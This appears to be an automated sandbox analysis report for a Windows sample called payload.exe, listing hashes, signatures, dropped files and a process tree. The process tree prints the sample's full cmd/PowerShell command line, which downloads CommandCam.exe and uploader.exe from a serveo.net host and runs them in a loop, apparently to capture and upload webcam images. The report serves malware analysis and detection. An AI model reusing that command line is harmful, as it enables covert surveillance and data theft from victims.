f24090ed6e8c1c8fd39072d623863a60135b2a402bc8630f299639244919d910

Analysis

max time kernel
150s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
26/03/2024, 04:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

payload.exe
Size

113KB
MD5

fe8ec3e67ce5fd574c3e4f2317aa81be
SHA1

8128adf325c80eff2532dcfd2e725f7db13cb720
SHA256

f24090ed6e8c1c8fd39072d623863a60135b2a402bc8630f299639244919d910
SHA512

84bcb7d555957a17e9995507b3686044b8d41385c1b1879a5bab10093df9ec2ee91acd2cf1ca0c4a5df4dddd638da234493f41158e1f87fe156aa090a900ada3
SSDEEP

1536:4OhdoS0GQM+dQbSty+Oq1n//+RGDAaxrRNvR4y7P9rvL:4qdotZM+fDn/CGRNfx

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://serveo.net:3697/CommandCam.exe

exe.dropper

http://serveo.net:3697/uploader.exe

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
23	1740	powershell.exe
32	1740	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 6 IoCs

pid	Process
3500	CommandCam.exe
2948	uploader.exe
748	CommandCam.exe
1312	uploader.exe
1472	CommandCam.exe
1672	uploader.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
2104	taskkill.exe
3400	taskkill.exe

Suspicious behavior: EnumeratesProcesses 17 IoCs

pid	Process
1740	powershell.exe
1740	powershell.exe
3700	powershell.exe
3700	powershell.exe
3700	powershell.exe
3700	powershell.exe
3700	powershell.exe
3700	powershell.exe
3700	powershell.exe
3700	powershell.exe
3700	powershell.exe
3700	powershell.exe
3700	powershell.exe
3700	powershell.exe
3700	powershell.exe
3700	powershell.exe
3700	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	1740	powershell.exe
Token: SeDebugPrivilege	3700	powershell.exe
Token: SeDebugPrivilege	2104	taskkill.exe
Token: SeDebugPrivilege	3400	taskkill.exe

Suspicious use of WriteProcessMemory 36 IoCs

description	pid	Process	procid_target
PID 3976 wrote to memory of 716	3976	payload.exe	89
PID 3976 wrote to memory of 716	3976	payload.exe	89
PID 3976 wrote to memory of 716	3976	payload.exe	89
PID 716 wrote to memory of 1648	716	cmd.exe	90
PID 716 wrote to memory of 1648	716	cmd.exe	90
PID 716 wrote to memory of 1648	716	cmd.exe	90
PID 716 wrote to memory of 1740	716	cmd.exe	91
PID 716 wrote to memory of 1740	716	cmd.exe	91
PID 716 wrote to memory of 1740	716	cmd.exe	91
PID 716 wrote to memory of 3700	716	cmd.exe	100
PID 716 wrote to memory of 3700	716	cmd.exe	100
PID 716 wrote to memory of 3700	716	cmd.exe	100
PID 3700 wrote to memory of 3500	3700	powershell.exe	103
PID 3700 wrote to memory of 3500	3700	powershell.exe	103
PID 3700 wrote to memory of 3500	3700	powershell.exe	103
PID 3700 wrote to memory of 2948	3700	powershell.exe	104
PID 3700 wrote to memory of 2948	3700	powershell.exe	104
PID 3700 wrote to memory of 2948	3700	powershell.exe	104
PID 3700 wrote to memory of 2104	3700	powershell.exe	119
PID 3700 wrote to memory of 2104	3700	powershell.exe	119
PID 3700 wrote to memory of 2104	3700	powershell.exe	119
PID 3700 wrote to memory of 748	3700	powershell.exe	120
PID 3700 wrote to memory of 748	3700	powershell.exe	120
PID 3700 wrote to memory of 748	3700	powershell.exe	120
PID 3700 wrote to memory of 1312	3700	powershell.exe	121
PID 3700 wrote to memory of 1312	3700	powershell.exe	121
PID 3700 wrote to memory of 1312	3700	powershell.exe	121
PID 3700 wrote to memory of 3400	3700	powershell.exe	131
PID 3700 wrote to memory of 3400	3700	powershell.exe	131
PID 3700 wrote to memory of 3400	3700	powershell.exe	131
PID 3700 wrote to memory of 1472	3700	powershell.exe	132
PID 3700 wrote to memory of 1472	3700	powershell.exe	132
PID 3700 wrote to memory of 1472	3700	powershell.exe	132
PID 3700 wrote to memory of 1672	3700	powershell.exe	133
PID 3700 wrote to memory of 1672	3700	powershell.exe	133
PID 3700 wrote to memory of 1672	3700	powershell.exe	133

C:\Users\Admin\AppData\Local\Temp\payload.exe
"C:\Users\Admin\AppData\Local\Temp\payload.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3976
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c cmd.exe /c cd %USERPROFILE%\ & echo (New-Object System.Net.WebClient).DownloadFile('http://serveo.net:3697/CommandCam.exe', 'CommandCam.exe') > %USERPROFILE%\getcc.ps1 & echo (New-Object System.Net.WebClient).DownloadFile('http://serveo.net:3697/uploader.exe', 'uploader.exe') >> %USERPROFILE%\getcc.ps1 & cd %USERPROFILE%\ & powershell -ExecutionPolicy ByPass -File %USERPROFILE%\getcc.ps1 & echo while ($true) { > %USERPROFILE%\sc.ps1 & echo start -NoNewWindow CommandCam.exe -Wait >> %USERPROFILE%\sc.ps1 & echo start -NoNewWindow uploader.exe >> %USERPROFILE%\sc.ps1 & echo sleep 60 >> %USERPROFILE%\sc.ps1 & echo taskkill /F /IM uploader.exe } >> %USERPROFILE%\sc.ps1 & cd %USERPROFILE%\ & powershell -ExecutionPolicy ByPass -File %USERPROFILE%\sc.ps1 & exit
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:716
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c cd C:\Users\Admin\
    3⤵
    PID:1648
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -ExecutionPolicy ByPass -File C:\Users\Admin\getcc.ps1
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1740
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -ExecutionPolicy ByPass -File C:\Users\Admin\sc.ps1
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3700
  - - C:\Users\Admin\CommandCam.exe
      "CommandCam.exe"
      4⤵
      Executes dropped EXE
      PID:3500
  - - C:\Users\Admin\uploader.exe
      "uploader.exe"
      4⤵
      Executes dropped EXE
      PID:2948
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /F /IM uploader.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2104
  - - C:\Users\Admin\CommandCam.exe
      "CommandCam.exe"
      4⤵
      Executes dropped EXE
      PID:748
  - - C:\Users\Admin\uploader.exe
      "uploader.exe"
      4⤵
      Executes dropped EXE
      PID:1312
  - - C:\Windows\SysWOW64\taskkill.exe
      "C:\Windows\system32\taskkill.exe" /F /IM uploader.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:3400
  - - C:\Users\Admin\CommandCam.exe
      "CommandCam.exe"
      4⤵
      Executes dropped EXE
      PID:1472
  - - C:\Users\Admin\uploader.exe
      "uploader.exe"
      4⤵
      Executes dropped EXE
      PID:1672

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
4280e36a29fa31c01e4d8b2ba726a0d8

SHA1
c485c2c9ce0a99747b18d899b71dfa9a64dabe32

SHA256
e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359

SHA512
494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
16KB

MD5
2e12ce080ac7587bd8364fdf159136d6

SHA1
b5241dffc38d8cbb26556c3bc8fee3e45bf82770

SHA256
b7d50218585d0d7390733657cf276eb7a1982be7df72a9abcc9d12563c0d9cf8

SHA512
7533ef60897ef8247db89d5b45d21d3c1bffd65389226b4980c52e56a60f42fbd0377eea894f29d0d751234d1802c775b033e0cab0e029ff603c3afab364274b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k2ubpf4h.e4n.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\CommandCam.exe

Filesize
64KB

MD5
ea678b48940aebe8fbf9a189949fc4a3

SHA1
bc831f699b16345877a0fb5cd49ee9949825e194

SHA256
5918f85960da8dee6784b2a75eb1e9fa81e1baf6c1727215933653df3f4e2dfb

SHA512
18e726cf62bc4e987fca0bd5c57dd0f8171a8f376cd37c58a18da6d8e2b33890223735b41ce4c3f6f0247dcfca8b803d506182687863f5d7015b3ff46f9b8415

Download Submit
C:\Users\Admin\getcc.ps1

Filesize
216B

MD5
76628a08298a8736289e2346f2856700

SHA1
a8c71d6df89e8ea6c25f51bcd412de88df7e5105

SHA256
9bafdcd2cbfd8c7607c2be2ef5376764e1870f276142bb7cf4e7c291f210c02e

SHA512
8d79bdbaa5f0a1013460bc79382a6a243110fc3d7e1271dd5232ceec9ca8321933c7f2de65cb3de87d295ed4176c3437b7bae92b96bbc1aa09b7fbe4f06925bd

Download Submit
C:\Users\Admin\sc.ps1

Filesize
143B

MD5
2a36e50db28701fa952161ad34039c4c

SHA1
e3e8259615eeb2432cd81396679fa137481c3150

SHA256
5704ba2006acaeb07f0817a67f03c128feb90237fec1638b5b92ed178647d104

SHA512
6a41b172f88f669bb6a2f476187492e200a41dc8b7bdaacfaab8db0d1c3dd65c3a387ad3151dd79fe3c481601763dd4a1164ba93541160a288edc0688c8e6fda

Download Submit
C:\Users\Admin\uploader.exe

Filesize
1009KB

MD5
13f7e957f5ac639b5852bd1ca821c11e

SHA1
aa9fdff1d2a8bf207f446c81f39a40c70edd9ab1

SHA256
cc8e24475ba9179e141def6493611274046fff3d0de544672159c25a3351c350

SHA512
38dacec8bc5185d01190454f65f90e45c53b5deaa7692f0b9879163a599e86ef4b579c626fee2e029c9311be9852b98526a89af3e6d0073785f84bd1714d9361

Download Submit
memory/748-99-0x00000000705E0000-0x0000000070619000-memory.dmp

Filesize
228KB

Download
memory/1312-101-0x0000000000400000-0x00000000004E2000-memory.dmp

Filesize
904KB

Download
memory/1472-110-0x00000000705E0000-0x0000000070619000-memory.dmp

Filesize
228KB

Download
memory/1472-109-0x00000000705E0000-0x0000000070619000-memory.dmp

Filesize
228KB

Download
memory/1672-113-0x0000000000400000-0x00000000004E2000-memory.dmp

Filesize
904KB

Download
memory/1740-8-0x00000000060A0000-0x0000000006106000-memory.dmp

Filesize
408KB

Download
memory/1740-21-0x00000000068B0000-0x00000000068FC000-memory.dmp

Filesize
304KB

Download
memory/1740-24-0x0000000006D80000-0x0000000006D9A000-memory.dmp

Filesize
104KB

Download
memory/1740-29-0x0000000074F30000-0x00000000756E0000-memory.dmp

Filesize
7.7MB

Download
memory/1740-9-0x0000000006240000-0x00000000062A6000-memory.dmp

Filesize
408KB

Download
memory/1740-19-0x00000000063B0000-0x0000000006704000-memory.dmp

Filesize
3.3MB

Download
memory/1740-20-0x0000000006890000-0x00000000068AE000-memory.dmp

Filesize
120KB

Download
memory/1740-23-0x0000000007EF0000-0x000000000856A000-memory.dmp

Filesize
6.5MB

Download
memory/1740-7-0x0000000006000000-0x0000000006022000-memory.dmp

Filesize
136KB

Download
memory/1740-6-0x0000000005960000-0x0000000005F88000-memory.dmp

Filesize
6.2MB

Download
memory/1740-5-0x00000000052E0000-0x00000000052F0000-memory.dmp

Filesize
64KB

Download
memory/1740-4-0x00000000052E0000-0x00000000052F0000-memory.dmp

Filesize
64KB

Download
memory/1740-2-0x00000000052F0000-0x0000000005326000-memory.dmp

Filesize
216KB

Download
memory/1740-3-0x0000000074F30000-0x00000000756E0000-memory.dmp

Filesize
7.7MB

Download
memory/2948-84-0x0000000000400000-0x00000000004E2000-memory.dmp

Filesize
904KB

Download
memory/3500-79-0x0000000070410000-0x0000000070449000-memory.dmp

Filesize
228KB

Download
memory/3500-80-0x0000000070410000-0x0000000070449000-memory.dmp

Filesize
228KB

Download
memory/3700-71-0x0000000005DF0000-0x0000000005E01000-memory.dmp

Filesize
68KB

Download
memory/3700-38-0x0000000002660000-0x0000000002670000-memory.dmp

Filesize
64KB

Download
memory/3700-66-0x0000000007330000-0x000000000734E000-memory.dmp

Filesize
120KB

Download
memory/3700-69-0x0000000007390000-0x0000000007433000-memory.dmp

Filesize
652KB

Download
memory/3700-70-0x0000000007510000-0x000000000751A000-memory.dmp

Filesize
40KB

Download
memory/3700-55-0x0000000007350000-0x0000000007382000-memory.dmp

Filesize
200KB

Download
memory/3700-72-0x0000000005E20000-0x0000000005E2E000-memory.dmp

Filesize
56KB

Download
memory/3700-73-0x0000000005E40000-0x0000000005E54000-memory.dmp

Filesize
80KB

Download
memory/3700-74-0x00000000076B0000-0x00000000076CA000-memory.dmp

Filesize
104KB

Download
memory/3700-75-0x0000000007690000-0x0000000007698000-memory.dmp

Filesize
32KB

Download
memory/3700-54-0x000000007F290000-0x000000007F2A0000-memory.dmp

Filesize
64KB

Download
memory/3700-52-0x00000000064A0000-0x00000000064C2000-memory.dmp

Filesize
136KB

Download
memory/3700-68-0x0000000002660000-0x0000000002670000-memory.dmp

Filesize
64KB

Download
memory/3700-56-0x0000000070D50000-0x0000000070D9C000-memory.dmp

Filesize
304KB

Download
memory/3700-67-0x0000000002660000-0x0000000002670000-memory.dmp

Filesize
64KB

Download
memory/3700-36-0x0000000074F30000-0x00000000756E0000-memory.dmp

Filesize
7.7MB

Download
memory/3700-87-0x0000000074F30000-0x00000000756E0000-memory.dmp

Filesize
7.7MB

Download
memory/3700-89-0x0000000002660000-0x0000000002670000-memory.dmp

Filesize
64KB

Download
memory/3700-90-0x0000000002660000-0x0000000002670000-memory.dmp

Filesize
64KB

Download
memory/3700-91-0x000000007F290000-0x000000007F2A0000-memory.dmp

Filesize
64KB

Download
memory/3700-92-0x0000000002660000-0x0000000002670000-memory.dmp

Filesize
64KB

Download
memory/3700-93-0x0000000002660000-0x0000000002670000-memory.dmp

Filesize
64KB

Download
memory/3700-51-0x0000000007270000-0x0000000007306000-memory.dmp

Filesize
600KB

Download
memory/3700-48-0x0000000005930000-0x0000000005C84000-memory.dmp

Filesize
3.3MB

Download
memory/3700-53-0x00000000078C0000-0x0000000007E64000-memory.dmp

Filesize
5.6MB

Download
memory/3700-37-0x0000000002660000-0x0000000002670000-memory.dmp

Filesize
64KB

Download
memory/3976-85-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download